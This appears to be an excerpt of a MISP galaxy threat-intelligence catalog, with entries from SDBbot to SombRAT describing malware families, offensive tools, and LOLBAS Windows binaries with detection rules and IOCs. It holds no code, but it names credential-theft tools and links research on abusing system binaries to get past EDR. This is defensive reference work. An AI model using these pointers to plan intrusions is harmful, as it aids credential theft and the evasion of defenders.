tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SDBbot

SDBbot is a backdoor with installer and loader components that has been used by TA505 since at least 2019.[Proofpoint TA505 October 2019][IBM TA505 April 2020]

Internal MISP references

UUID 046bbd0c-bff5-46fc-9028-cbe46a9f8ec5 which can be used as unique global reference for SDBbot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0461
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

SDelete

SDelete is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. [Microsoft SDelete July 2016]

Internal MISP references

UUID 3d4be65d-231b-44bb-8d12-5038a3d48bae which can be used as unique global reference for SDelete in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0195
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['tool']
Related clusters

To see the related clusters, click here.

SeaDuke

SeaDuke is malware that was used by APT29 from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with CozyCar. [F-Secure The Dukes]

Internal MISP references

UUID ae30d58e-21c5-41a4-9ebb-081dc1f26863 which can be used as unique global reference for SeaDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0053
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

Seasalt

Seasalt is malware that has been linked to APT1's 2010 operations. It shares some code similarities with OceanSalt.[Mandiant APT1 Appendix][McAfee Oceansalt Oct 2018]

Internal MISP references

UUID 3527b09b-f3f6-4716-9f90-64ea7d3b9d8a which can be used as unique global reference for Seasalt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0345
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SEASHARPEE

SEASHARPEE is a Web shell that has been used by OilRig. [FireEye APT34 Webinar Dec 2017]

Internal MISP references

UUID 42c8504c-8a18-46d2-a145-35b0cd8ba669 which can be used as unique global reference for SEASHARPEE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0185
source MITRE
tags ['311abf64-a9cc-4c6a-b778-32c5df5658be']
type ['malware']
Related clusters

To see the related clusters, click here.

Seatbelt

Seatbelt is a tool used to perform numerous security-oriented checks.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 74beac1c-8468-4f1e-8990-11a4eb7b0110 which can be used as unique global reference for Seatbelt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5042
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

secretsdump

According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script "used to extract credentials and other confidential information from a system".[U.S. CISA Rhysida Ransomware November 15 2023] Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.[GitHub secretsdump]

Internal MISP references

UUID a1fef846-cb22-4885-aa14-cb67ab38fce4 which can be used as unique global reference for secretsdump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5072
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '61b7b81d-3f98-4bed-97a9-d6c536b8969b', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c']
type ['tool']
Related clusters

To see the related clusters, click here.

ServHelper

ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[Proofpoint TA505 Jan 2019]

Internal MISP references

UUID 704ed49d-103c-4b33-b85c-73670cc1d719 which can be used as unique global reference for ServHelper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0382
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Seth-Locker

Seth-Locker is a ransomware with some remote control capabilities that has been in use since at least 2021. [Trend Micro Ransomware February 2021]

Internal MISP references

UUID fb47c051-d22b-4a05-94a7-cf979419b60a which can be used as unique global reference for Seth-Locker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0639
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Setres

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Configures display settings

Author: Grzegorz Tworek

Paths: * c:\windows\system32\setres.exe

Resources: * https://twitter.com/0gtweet/status/1583356502340870144

Detection:
* Sigma: proc_creation_win_lolbin_setres.yml
* IOC: Unusual location for choice.exe file
* IOC: Process created from choice.com binary
* IOC: Existence of choice.cmd file[Setres.exe - LOLBAS Project]

Internal MISP references

UUID ad872ead-f3be-49df-b2f3-2526246acdf5 which can be used as unique global reference for Setres in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5162
source Tidal Cyber
tags ['d75511ab-cbff-46d3-8268-427e3cff134a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SettingSyncHost

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Host Process for Setting Synchronization

Author: Elliot Killick

Paths:
* C:\Windows\System32\SettingSyncHost.exe
* C:\Windows\SysWOW64\SettingSyncHost.exe

Resources: * https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/

Detection:
* Sigma: proc_creation_win_lolbin_settingsynchost.yml
* IOC: SettingSyncHost.exe should not be run on a normal workstation[SettingSyncHost.exe - LOLBAS Project]

Internal MISP references

UUID e46a42d6-ca6e-4237-ab66-b0d102a580c7 which can be used as unique global reference for SettingSyncHost in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5163
source Tidal Cyber
tags ['8929bc83-9ed6-4579-b837-40236b59b383', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Setupapi

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Setup Application Programming Interface

Author: LOLBAS Team

Paths:
* c:\windows\system32\setupapi.dll
* c:\windows\syswow64\setupapi.dll

Resources:
* https://github.com/huntresslabs/evading-autoruns
* https://twitter.com/pabraeken/status/994742106852941825
* https://windows10dll.nirsoft.net/setupapi_dll.html

Detection:
* Sigma: proc_creation_win_rundll32_setupapi_installhinfsection.yml
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___setupapi.yml[Setupapi.dll - LOLBAS Project]

Internal MISP references

UUID e7d450ec-dd29-455f-8d26-f8a563e1e88d which can be used as unique global reference for Setupapi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5195
source Tidal Cyber
tags ['da405033-3571-4f98-9810-53d9df1ac0fb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ShadowPad

ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups. [Recorded Future RedEcho Feb 2021][Securelist ShadowPad Aug 2017][Kaspersky ShadowPad Aug 2017]

Internal MISP references

UUID 5190f50d-7e54-410a-9961-79ab751ddbab which can be used as unique global reference for ShadowPad in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0596
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Shamoon

Shamoon is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. Shamoon has also been seen leveraging RawDisk and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.[Palo Alto Shamoon Nov 2016][Unit 42 Shamoon3 2018][Symantec Shamoon 2012][FireEye Shamoon Nov 2016]

Internal MISP references

UUID 840db1db-e262-4d6f-b6e3-2a64696a41c5 which can be used as unique global reference for Shamoon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0140
source MITRE
tags ['e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']

Shark

Shark is a backdoor malware written in C# and .NET that is an updated version of Milan; it has been used by HEXANE since at least July 2021.[ClearSky Siamesekitten August 2021][Accenture Lyceum Targets November 2021]

Internal MISP references

UUID 278da5e8-4d4c-4c45-ad72-8f078872fb4a which can be used as unique global reference for Shark in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1019
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

SharpChromium

SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a ".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins."[GitHub SharpChromium]

Internal MISP references

UUID 311e8944-2157-4616-8b95-d75020e21c35 which can be used as unique global reference for SharpChromium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5075
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']
Related clusters

To see the related clusters, click here.

SharpDisco

SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.[MoustachedBouncer ESET August 2023]

Internal MISP references

UUID 4ed1e83b-a208-5518-bed2-d07c1b289da2 which can be used as unique global reference for SharpDisco in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1089
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SharpHound

SharpHound is an open-source software utility incorporated into the BloodHound Active Directory (AD) reconnaissance tool.[GitHub SharpHound] Adversaries have used SharpHound for AD enumeration.[U.S. CISA Phobos February 29 2024]

Internal MISP references

UUID 0bcf0dae-315f-491f-bc65-b1772ffa31c1 which can be used as unique global reference for SharpHound in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5275
source Tidal Cyber
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508']
type ['tool']
Related clusters

To see the related clusters, click here.

SharpRoast

SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.[GitHub SharpRoast]

Internal MISP references

UUID 54a5c881-c1ad-40d0-88c0-6c32b9ef95cb which can be used as unique global reference for SharpRoast in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5060
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c']
type ['malware']
Related clusters

To see the related clusters, click here.

SharpShares

SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]

Internal MISP references

UUID a202b37f-5c61-410b-bb14-a3e6b2b82833 which can be used as unique global reference for SharpShares in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5004
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

SharpStage

SharpStage is a .NET malware with backdoor capabilities.[Cybereason Molerats Dec 2020][BleepingComputer Molerats Dec 2020]

Internal MISP references

UUID 564643fd-7113-490e-9f6a-f0cc3f0e1a4c which can be used as unique global reference for SharpStage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0546
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SHARPSTATS

SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[TrendMicro POWERSTATS V3 June 2019]

Internal MISP references

UUID f655306f-f7b4-4eec-9bd6-ac75142fcb43 which can be used as unique global reference for SHARPSTATS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0450
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Shdocvw

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Shell Doc Object and Control Library.

Author: LOLBAS Team

Paths:
* c:\windows\system32\shdocvw.dll
* c:\windows\syswow64\shdocvw.dll

Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/997690405092290561
* https://windows10dll.nirsoft.net/shdocvw_dll.html

Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Shdocvw.dll - LOLBAS Project]

Internal MISP references

UUID 67323b8a-e805-4503-8a40-d47f229453a0 which can be used as unique global reference for Shdocvw in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5196
source Tidal Cyber
tags ['2c0f0b44-9b09-49a0-8dc5-d9fdcc515825', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Shell32

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Shell Common Dll

Author: LOLBAS Team

Paths:
* c:\windows\system32\shell32.dll
* c:\windows\syswow64\shell32.dll

Resources:
* https://twitter.com/Hexacorn/status/885258886428725250
* https://twitter.com/pabraeken/status/991768766898941953
* https://twitter.com/mattifestation/status/776574940128485376
* https://twitter.com/KyleHanslovan/status/905189665120149506
* https://windows10dll.nirsoft.net/shell32_dll.html

Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: rundll32_control_rundll_hunt.yml[Shell32.dll - LOLBAS Project]

Internal MISP references

UUID edf31b62-e9db-43c8-b9ef-55afd6b0404c which can be used as unique global reference for Shell32 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5197
source Tidal Cyber
tags ['e0b9882e-b9bb-4c16-b3d9-9268866eded0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Shimgvw

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Photo Gallery Viewer

Author: Eral4m

Paths:
* c:\windows\system32\shimgvw.dll
* c:\windows\syswow64\shimgvw.dll

Resources: * https://twitter.com/eral4m/status/1479080793003671557

Detection: * IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line[Shimgvw.dll - LOLBAS Project]

Internal MISP references

UUID 691b3a37-af46-47d2-a027-d93d901e0dac which can be used as unique global reference for Shimgvw in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5198
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ShimRat

ShimRat has been used by the suspected China-based adversary Mofang in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "ShimRat" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. [FOX-IT May 2016 Mofang]

Internal MISP references

UUID a3287231-351f-472f-96cc-24db2e3829c7 which can be used as unique global reference for ShimRat in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0444
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

ShimRatReporter

ShimRatReporter is a tool used by suspected Chinese adversary Mofang to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as ShimRat) as well as set up faux infrastructure which mimics the adversary's targets. ShimRatReporter has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.[FOX-IT May 2016 Mofang]

Internal MISP references

UUID 77d9c948-93e3-4e12-9764-4da7570d9275 which can be used as unique global reference for ShimRatReporter in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0445
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

SHIPSHAPE

SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]

Internal MISP references

UUID 3db0b464-ec5d-4cdd-86c2-62eac9c8acd6 which can be used as unique global reference for SHIPSHAPE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0028
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SHOTPUT

SHOTPUT is a custom backdoor used by APT3. [FireEye Clandestine Wolf]

Internal MISP references

UUID 49351818-579e-4298-9137-03b3dc699e22 which can be used as unique global reference for SHOTPUT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0063
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SHUTTERSPEED

SHUTTERSPEED is a backdoor used by APT37. [FireEye APT37 Feb 2018]

Internal MISP references

UUID 5b2d82a6-ed96-485d-bca9-2320590de890 which can be used as unique global reference for SHUTTERSPEED in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0217
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Sibot

Sibot is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three Sibot variants in early 2021 during its investigation of APT29 and the SolarWinds Compromise.[MSTIC NOBELIUM Mar 2021]

Internal MISP references

UUID ea0a1282-f2bf-4ae0-a19c-d7e379c2309b which can be used as unique global reference for Sibot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0589
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

SideTwist

SideTwist is a C-based backdoor that has been used by OilRig since at least 2021.[Check Point APT34 April 2021]

Internal MISP references

UUID 61227a76-d315-4339-803a-e024f96e089e which can be used as unique global reference for SideTwist in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0610
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

SILENTTRINITY

SILENTTRINITY is an open-source remote administration and post-exploitation framework primarily written in Python that includes stagers written in PowerShell, C, and Boo. SILENTTRINITY was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.[GitHub SILENTTRINITY March 2022][Security Affairs SILENTTRINITY July 2019]

Internal MISP references

UUID 4765999f-c35e-4a9f-8284-9f10a17e6c34 which can be used as unique global reference for SILENTTRINITY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0692
source MITRE
type ['tool']

Siloscape

Siloscape is malware that targets Kubernetes clusters through Windows containers. Siloscape was first observed in March 2021.[Unit 42 Siloscape Jun 2021]

Internal MISP references

UUID 8ea75674-cc08-40cf-824c-40eb5cd6097e which can be used as unique global reference for Siloscape in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Windows']
software_attack_id S0623
source MITRE
tags ['4fa6f8e1-b0d5-4169-8038-33e355c08bde']
type ['malware']

Skeleton Key

Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. [Dell Skeleton] Functionality similar to Skeleton Key is included as a module in Mimikatz.

Internal MISP references

UUID 206453a4-a298-4cab-9fdf-f136a4e0c761 which can be used as unique global reference for Skeleton Key in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0007
source MITRE
type ['malware']

Skidmap

Skidmap is a kernel-mode rootkit used for cryptocurrency mining.[Trend Micro Skidmap]

Internal MISP references

UUID cc91d3d4-bbf5-4a9c-b43a-2ba034db4858 which can be used as unique global reference for Skidmap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0468
source MITRE
type ['malware']

Sliver

Sliver is an open source, cross-platform, red team command and control framework written in Golang.[Bishop Fox Sliver Framework August 2019]

Internal MISP references

UUID bbd16b7b-7e35-4a11-86ff-9b19e17bdab3 which can be used as unique global reference for Sliver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0633
source MITRE
tags ['e81ba503-60b0-4b64-8f20-ef93e7783796']
type ['tool']
Related clusters

To see the related clusters, click here.

SLOTHFULMEDIA

SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.[CISA MAR SLOTHFULMEDIA October 2020][Costin Raiu IAmTheKing October 2020] It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.[USCYBERCOM SLOTHFULMEDIA October 2020][Kaspersky IAmTheKing October 2020]

In October 2020, Kaspersky Labs assessed SLOTHFULMEDIA is part of an activity cluster it refers to as "IAmTheKing".[Kaspersky IAmTheKing October 2020] ESET also noted code similarity between SLOTHFULMEDIA and droppers used by a group it refers to as "PowerPool".[ESET PowerPool Code October 2020]

Internal MISP references

UUID 563c6534-497e-4d65-828c-420d5bb2041a which can be used as unique global reference for SLOTHFULMEDIA in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0533
source MITRE
type ['malware']

SLOWDRIFT

SLOWDRIFT is a backdoor used by APT37 against academic and strategic victims in South Korea. [FireEye APT37 Feb 2018]

Internal MISP references

UUID 7c047a54-93cf-4dfc-ab20-d905791aebb2 which can be used as unique global reference for SLOWDRIFT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0218
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Small Sieve

Small Sieve is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][NCSC GCHQ Small Sieve Jan 2022]

Security researchers have also noted Small Sieve's use by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022]

Internal MISP references

UUID c58028b9-2e79-4bc9-9b04-d24ea4dd4948 which can be used as unique global reference for Small Sieve in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1035
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

SMOKEDHAM

SMOKEDHAM is a PowerShell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.[FireEye Shining A Light on DARKSIDE May 2021][FireEye SMOKEDHAM June 2021]

Internal MISP references

UUID 9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3 which can be used as unique global reference for SMOKEDHAM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0649
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']

Smoke Loader

Smoke Loader is a malicious bot application that can be used to load other malware. Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. [Malwarebytes SmokeLoader 2016] [Microsoft Dofoil 2018]

Internal MISP references

UUID 2244253f-a4ad-4ea9-a4bf-fa2f4d895853 which can be used as unique global reference for Smoke Loader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0226
source MITRE
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Snip3

Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[Morphisec Snip3 May 2021][Telefonica Snip3 December 2021]

Internal MISP references

UUID f587dc27-92be-5894-a4a8-d6c8bbcf8ede which can be used as unique global reference for Snip3 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1086
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SNUGRIDE

SNUGRIDE is a backdoor that has been used by menuPass as first stage malware. [FireEye APT10 April 2017]

Internal MISP references

UUID d6c24f7c-fe79-4094-8f3c-68c4446ae4c7 which can be used as unique global reference for SNUGRIDE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0159
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Socksbot

Socksbot is a backdoor that abuses Socket Secure (SOCKS) proxies. [TrendMicro Patchwork Dec 2017]

Internal MISP references

UUID c1906bb6-0b5b-4916-8b29-37f7e272f6b3 which can be used as unique global reference for Socksbot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0273
source MITRE
type ['malware']

SodaMaster

SodaMaster is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]

Internal MISP references

UUID 6ecd970c-427b-4421-a831-69f46047d22a which can be used as unique global reference for SodaMaster in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0627
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

SoftPerfect Network Scanner

SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 4272447f-8803-4947-b66f-051eecdd3385 which can be used as unique global reference for SoftPerfect Network Scanner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5008
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

SombRAT

SombRAT is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including FIVEHANDS ransomware.[BlackBerry CostaRicto November 2020][FireEye FiveHands April 2021][CISA AR21-126A FIVEHANDS May 2021]

Internal MISP references

